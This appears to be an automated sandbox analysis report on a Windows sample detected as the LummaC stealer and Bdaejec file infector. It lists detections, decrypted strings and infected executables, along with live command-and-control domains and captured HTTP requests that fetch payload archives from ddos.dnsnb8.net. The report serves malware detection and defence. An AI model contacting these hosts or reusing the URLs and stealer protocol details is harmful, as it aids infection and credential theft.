Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

Code function: 2_2_00321718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv,

2_2_00321718

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

Code function: 2_2_0032139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,

2_2_0032139F

AV process strings found (often used to terminate AV products)

Source: jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files\Windows Defender\MsMpEng.exe
Source: Amcache.hve.2.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: jawuwAtX.exe PID: 5352, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: jawuwAtX.exe PID: 5352, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
44.221.84.105	ddos.dnsnb8.net	United States		14618	AMAZON-AESUS	false

Contacted Domains

Name	IP	Active
ddos.dnsnb8.net	44.221.84.105	true
healthproline.pro	unknown	unknown
smallrabbitcrossing.site	unknown	unknown
strainriskpropos.store	unknown	unknown
snuggleapplicationswo.fun	unknown	unknown
punchtelephoneverdi.store	unknown	unknown
telephoneverdictyow.site	unknown	unknown
theoryapparatusjuko.fun	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
healthproline.pro	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
smallrabbitcrossing.site	true	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k2.rar	true	URL Reputation: malware	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar	true	URL Reputation: malware	unknown
punchtelephoneverdi.stor	true	Avira URL Cloud: safe	unknown
telephoneverdictyow.site	true	Avira URL Cloud: malware	unknown
strainriskpropos.stor	true	Avira URL Cloud: safe	unknown
theoryapparatusjuko.fun	true		unknown
snuggleapplicationswo.fun	true	Avira URL Cloud: malware	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Lisect_AVT_24003_G1A_72.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ddos.dnsnb8.net:799/cj//k2.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net/	URL Reputation: Label: malware
Source: healthproline.pro	Avira URL Cloud: Label: malware
Source: smallrabbitcrossing.site	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rars	Avira URL Cloud: Label: phishing
Source: https://strainriskpropos.store/api	Avira URL Cloud: Label: malware
Source: https://strainriskpropos.store:443/api	Avira URL Cloud: Label: malware
Source: https://telephoneverdictyow.site/apiGaX	Avira URL Cloud: Label: malware
Source: https://strainriskpropos.store/D%D	Avira URL Cloud: Label: malware
Source: https://punchtelephoneverdi.store:443/api	Avira URL Cloud: Label: malware
Source: https://snuggleapplicationswo.fun/	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarNp3	Avira URL Cloud: Label: malware
Source: https://telephoneverdictyow.site/l	Avira URL Cloud: Label: malware
Source: https://telephoneverdictyow.site/	Avira URL Cloud: Label: malware
Source: https://smallrabbitcrossing.site/api	Avira URL Cloud: Label: malware
Source: https://telephoneverdictyow.site/api	Avira URL Cloud: Label: malware
Source: telephoneverdictyow.site	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar=	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarh	Avira URL Cloud: Label: phishing
Source: https://punchtelephoneverdi.store/	Avira URL Cloud: Label: malware
Source: https://strainriskpropos.store/	Avira URL Cloud: Label: malware
Source: https://strainriskpropos.store/M%s	Avira URL Cloud: Label: malware
Source: https://punchtelephoneverdi.store/apihL	Avira URL Cloud: Label: malware
Source: https://strainriskpropos.store/api;	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarZ	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarF;	Avira URL Cloud: Label: phishing
Source: https://telephoneverdictyow.site:443/api	Avira URL Cloud: Label: malware
Source: https://smallrabbitcrossing.site/	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManager1	Avira URL Cloud: Label: malware
Source: snuggleapplicationswo.fun	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files\7-Zip\Uninstall.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Jadtre.B

Found malware configuration

Source: Lisect_AVT_24003_G1A_72.exe.5024.0.memstrmin

Multi AV Scanner detection for domain / URL

Source: ddos.dnsnb8.net	Virustotal: Detection: 12%	Perma Link
Source: healthproline.pro	Virustotal: Detection: 10%	Perma Link
Source: telephoneverdictyow.site	Virustotal: Detection: 21%	Perma Link
Source: punchtelephoneverdi.store	Virustotal: Detection: 20%	Perma Link
Source: theoryapparatusjuko.fun	Virustotal: Detection: 20%	Perma Link
Source: snuggleapplicationswo.fun	Virustotal: Detection: 21%	Perma Link
Source: strainriskpropos.store	Virustotal: Detection: 21%	Perma Link
Source: smallrabbitcrossing.site	Virustotal: Detection: 21%	Perma Link
Source: https://strainriskpropos.store:443/api	Virustotal: Detection: 18%	Perma Link
Source: https://strainriskpropos.store/api	Virustotal: Detection: 18%	Perma Link
Source: healthproline.pro	Virustotal: Detection: 10%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

ReversingLabs: Detection: 92%

Multi AV Scanner detection for submitted file

Source: Lisect_AVT_24003_G1A_72.exe

Virustotal: Detection: 86%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files\7-Zip\Uninstall.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Lisect_AVT_24003_G1A_72.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String decryptor: strainriskpropos.stor
Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String decryptor: telephoneverdictyow.site
Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String decryptor: punchtelephoneverdi.stor
Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String decryptor: smallrabbitcrossing.site
Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String decryptor: snuggleapplicationswo.fun
Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String decryptor: theoryapparatusjuko.fun
Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String decryptor: healthproline.pro
Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp	String decryptor: kPnM2L--LogsDillerCloud

Uses 32bit PE files

Source: Lisect_AVT_24003_G1A_72.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Lisect_AVT_24003_G1A_72.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

Code function: 2_2_003229E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

2_2_003229E2

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

Code function: 2_2_00322B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

2_2_00322B8C

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: strainriskpropos.stor
Source: Malware configuration extractor	URLs: telephoneverdictyow.site
Source: Malware configuration extractor	URLs: punchtelephoneverdi.stor
Source: Malware configuration extractor	URLs: smallrabbitcrossing.site
Source: Malware configuration extractor	URLs: smallrabbitcrossing.site
Source: Malware configuration extractor	URLs: snuggleapplicationswo.fun
Source: Malware configuration extractor	URLs: theoryapparatusjuko.fun
Source: Malware configuration extractor	URLs: healthproline.pro
Source: Malware configuration extractor	URLs: strainriskpropos.stor
Source: Malware configuration extractor	URLs: telephoneverdictyow.site
Source: Malware configuration extractor	URLs: punchtelephoneverdi.stor
Source: Malware configuration extractor	URLs: smallrabbitcrossing.site
Source: Malware configuration extractor	URLs: smallrabbitcrossing.site
Source: Malware configuration extractor	URLs: snuggleapplicationswo.fun
Source: Malware configuration extractor	URLs: theoryapparatusjuko.fun
Source: Malware configuration extractor	URLs: healthproline.pro

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 799

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.6:49713 -> 44.221.84.105:799

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 44.221.84.105 44.221.84.105

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

Code function: 2_2_00321099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,

2_2_00321099

Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: ddos.dnsnb8.net
Source: global traffic	DNS traffic detected: DNS query: healthproline.pro
Source: global traffic	DNS traffic detected: DNS query: theoryapparatusjuko.fun
Source: global traffic	DNS traffic detected: DNS query: snuggleapplicationswo.fun
Source: global traffic	DNS traffic detected: DNS query: smallrabbitcrossing.site
Source: global traffic	DNS traffic detected: DNS query: punchtelephoneverdi.store
Source: global traffic	DNS traffic detected: DNS query: telephoneverdictyow.site
Source: global traffic	DNS traffic detected: DNS query: strainriskpropos.store

Source: jawuwAtX.exe, 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp, jawuwAtX.exe, 00000002.00000003.2145539627.0000000000F50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000001022000.00000004.00000020.00020000.00000000.sdmp, jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/
Source: jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar=
Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000001022000.00000004.00000020.00020000.00000000.sdmp, jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarZ
Source: jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rars
Source: jawuwAtX.exe, 00000002.00000002.2236447017.0000000002A4A000.00000004.00000010.00020000.00000000.sdmp, jawuwAtX.exe, 00000002.00000002.2236131842.0000000001054000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManager1
Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000001054000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarF;
Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000001054000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarNp3
Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000001022000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarh
Source: Amcache.hve.2.dr	String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.develop.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.lua.org
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.spaceblue.comMathias
Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000001022000.00000004.00000020.00020000.00000000.sdmp, jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://punchtelephoneverdi.store/
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195739242.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192972204.00000000013C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://punchtelephoneverdi.store/apihL
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192469958.00000000013D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://punchtelephoneverdi.store:443/api
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://smallrabbitcrossing.site/
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195739242.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192972204.00000000013C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://smallrabbitcrossing.site/api
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://snuggleapplicationswo.fun/
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195660941.000000000138E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://strainriskpropos.store/
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195660941.000000000138E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://strainriskpropos.store/D%D
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195660941.000000000138E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://strainriskpropos.store/M%s
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195739242.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192972204.00000000013BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://strainriskpropos.store/api
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://strainriskpropos.store/api;
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192469958.00000000013D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://strainriskpropos.store:443/api
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://telephoneverdictyow.site/
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://telephoneverdictyow.site/api
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192972204.00000000013C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://telephoneverdictyow.site/apiGaX
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://telephoneverdictyow.site/l
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192469958.00000000013D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://telephoneverdictyow.site:443/api
Source: SciTE.exe.2.dr	String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.2.dr	String found in binary or memory: https://www.smartsharesystems.com/Morten

Installs a raw input device (often for capturing keystrokes)

Source: SciTE.exe.2.dr

Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

memstr_6127ce1a-0

System Summary

PE file contains section with special chars

Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_72.exe	Static PE information: section name: #bu
Source: MyProg.exe.2.dr	Static PE information: section name: Y\|uR

PE file has a writeable .text section

Source: jawuwAtX.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Code function: 2_2_00326076		2_2_00326076
Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe	Code function: 2_2_00326D00		2_2_00326D00

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794

One or more processes crash

Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1548

PE file contains executable resources (Code or Archives)

Source: MyProg.exe.2.dr

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79

Sample file is different than original file name gathered from version info

Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2178655247.0000000003497000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCubase5.exeF vs Lisect_AVT_24003_G1A_72.exe
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2193713939.0000000000431000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameCubase5.exeF vs Lisect_AVT_24003_G1A_72.exe
Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2180934441.0000000003472000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCubase5.exeF vs Lisect_AVT_24003_G1A_72.exe
Source: Lisect_AVT_24003_G1A_72.exe	Binary or memory string: OriginalFilenameCubase5.exeF vs Lisect_AVT_24003_G1A_72.exe

Uses 32bit PE files

Source: Lisect_AVT_24003_G1A_72.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: jawuwAtX.exe.0.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: jawuwAtX.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: jawuwAtX.exe.0.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

